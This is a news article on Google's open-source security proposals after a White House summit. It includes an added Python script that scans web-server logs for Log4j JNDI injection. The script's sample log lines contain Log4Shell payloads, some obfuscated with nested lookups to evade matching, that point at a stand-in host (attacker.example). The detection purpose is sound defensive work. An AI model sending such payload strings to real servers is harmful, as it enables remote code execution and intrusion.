Google says that it wants to increase government collaboration to help secure open-source after participating in a White House summit.
On Thursday, Google participated in the White House Open Source Software Security Summit with the aim of building on its “work with the Administration to strengthen America’s collective cybersecurity through critical areas like open-source software.”
The past year has been particularly bad for open-source security problems, with several even making national headlines. This year hasn’t begun much better.
Open-source is broken
While it was technically uncovered in December, the fallout from the Log4j vulnerability has continued into the new year. The flaw in the open-source Java logging library – commonly used by apps and services across the internet – lets attackers execute code on affected servers simply by getting a crafted string logged, from where they can steal passwords and logins, extract data, and infect networks with malicious software.
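The reason a single logged string was enough is that Log4j expands `${...}` lookups inside the messages it logs, and the `${jndi:...}` lookup makes the server contact an attacker-supplied LDAP or RMI endpoint. Attackers quickly nested other lookups (`${lower:j}`, `${env:NO_SUCH_VAR:-j}`) around the word "jndi" to slip past naive string matching. The following Python scan, an added example that is not part of the original article and not Google's or the Log4j project's code, normalises those nested lookups before matching and runs over a handful of constructed web-server log lines (the IPs, the `attacker.example` host and the request lines are all made up for the demo). It is a triage aid for detection teams, not a fix; the fix is upgrading `log4j-core` to a patched release.

```python
import re

# Constructed sample log lines for the demo; they are not taken from any real incident.
SAMPLE_LOGS = [
    '10.0.0.1 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '10.0.0.4 - - "GET / HTTP/1.1" 200 "${${env:NO_SUCH_VAR:-j}ndi:rmi://attacker.example/b}"',
    '10.0.0.5 - - "GET /report?date=${date:yyyy-MM-dd} HTTP/1.1" 200 "curl/7.79"',
]

# ${lower:x} / ${upper:x} evaluate to x in the respective case.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to 'default' when the lookup fails, which attackers
# abuse with variable names that do not exist. The body must not contain nested ${ }.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What we are really looking for once the obfuscation is collapsed: a JNDI lookup
# with a remote scheme. Log4j matches the lookup prefix case-insensitively.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:",
    re.IGNORECASE,
)


def _case_fold(match: re.Match) -> str:
    """Replace ${lower:x}/${upper:x} with the cased value of x."""
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def normalize(text: str, max_passes: int = 10) -> str:
    """Collapse the nested case/default-value lookups used to hide 'jndi'.

    Lookups can be nested several levels deep, so substitute repeatedly until
    the string stops changing (bounded so hostile input cannot loop forever).
    """
    for _ in range(max_passes):
        new = CASE_LOOKUP.sub(_case_fold, text)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((i, norm))
    return hits


if __name__ == "__main__":
    for index, norm in scan(SAMPLE_LOGS):
        print(f"line {index}: {norm}")
```

Running it flags lines 1, 2 and 3 of the sample, all three normalising to a plain `${jndi:...}` lookup, while the benign `${date:...}` lookup on line 4 is ignored. A real deployment would feed it from whatever captures request headers and bodies (User-Agent, X-Forwarded-For and form fields were the common carriers), and would treat a hit as a reason to check whether the host made an outbound LDAP or RMI connection, not as proof of compromise on its own.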
Kent Walker, President of Global Affairs & Chief Legal Officer at Google & Alphabet, wrote in a blog post:
“Industries and governments have been making strides to tackle the frequent security issues that plague legacy, proprietary software.
The recent log4j open-source software vulnerability shows that we need the same attention and commitment to safeguarding open-source tools, which are just as critical.”
The Log4j vulnerability appears to have been entirely accidental and has since been patched, although many apps and services have yet to apply the fix. However, some open-source issues are introduced on purpose.
Just earlier this week, Developer reported on an open-source developer who corrupted two of his popular libraries so that they indefinitely print gibberish to the consoles of apps using them, rendering those apps useless. Then, of course, there was the SolarWinds supply-chain compromise disclosed in December 2020, in which attackers tampered with the vendor's own build pipeline rather than an open-source library.
Open-source is key to modern software development. The benefits are numerous: faster releases, no vendor lock-in, lower costs, greater transparency, and many projects have a great community spirit (many also don't, but we'll stick to the positives!).
According to Synopsys’ 2021 Open Source Security and Risk Analysis (OSSRA) report, 98 percent of the audited codebases contained at least one open-source component and 75 percent of all codebases were composed of open-source.
However, 84 percent of codebases were found to have at least one vulnerability, with an average of 158 per codebase. The average vulnerability found was 2.2 years old.
“Because it is freely available, open-source facilitates collaborative innovation and the development of new technologies to help solve shared problems. That’s why many aspects of critical infrastructure and national security systems incorporate it.
But there’s no official resource allocation and few formal requirements or standards for maintaining the security of that critical code. In fact, most of the work to maintain and enhance the security of open-source, including fixing known vulnerabilities, is done on an ad-hoc, volunteer basis.”
The lack of payment for his work is one of the reasons the aforementioned open-source developer gave for corrupting his own libraries.
“Respectfully, I am no longer going to support Fortune 500s (and other smaller sized companies) with my free work,” he wrote in a post on his project’s GitHub. “Take this as an opportunity to send me a six-figure yearly contract or fork the project and have someone else work on it.”
The issue split the software development community. Some were sympathetic – after all, everyone has to put food on the table – while others were less so.
Google has contributed financial resources to groups and individuals doing critical open-source work. Last year, Google committed $10 billion over the next five years to "advance cybersecurity", including fixing some of the key problems with open-source and offering more training.
As part of that commitment, Google allocated $100 million to support independent organisations – including the Open Source Security Foundation (OpenSSF) – that do the noble work of helping to fix open-source vulnerabilities.
Three proposals to fix open-source
During this week’s summit, Google shared three proposals to improve how open-source is maintained and secured.
The first proposal is establishing a public-private partnership to identify critical projects. Google believes this will help prioritise and allocate resources where they are most likely to have the greatest positive impact.
Next up is establishing security, maintenance, and testing baselines.
Google already has form in this area, having established SLSA (Supply-chain Levels for Software Artifacts), an end-to-end framework for ensuring supply chain integrity. The framework is now hosted by OpenSSF, an organisation already working to create further cross-industry standards.
The final proposal is to increase public and private support.
“In the discussion today, we proposed setting up an organisation to serve as a marketplace for open-source maintenance, matching volunteers from companies with the critical projects that most need support,” explains Walker.
“Google stands ready to contribute resources to this effort.”
Actions speak louder than words and, so far, Google has backed its words by contributing talent and significant financial resources towards fixing open-source.
Greater collaboration across the private and public sectors on open-source can only be a good thing. Google's proposals look to lay a solid foundation for how that could work in practice.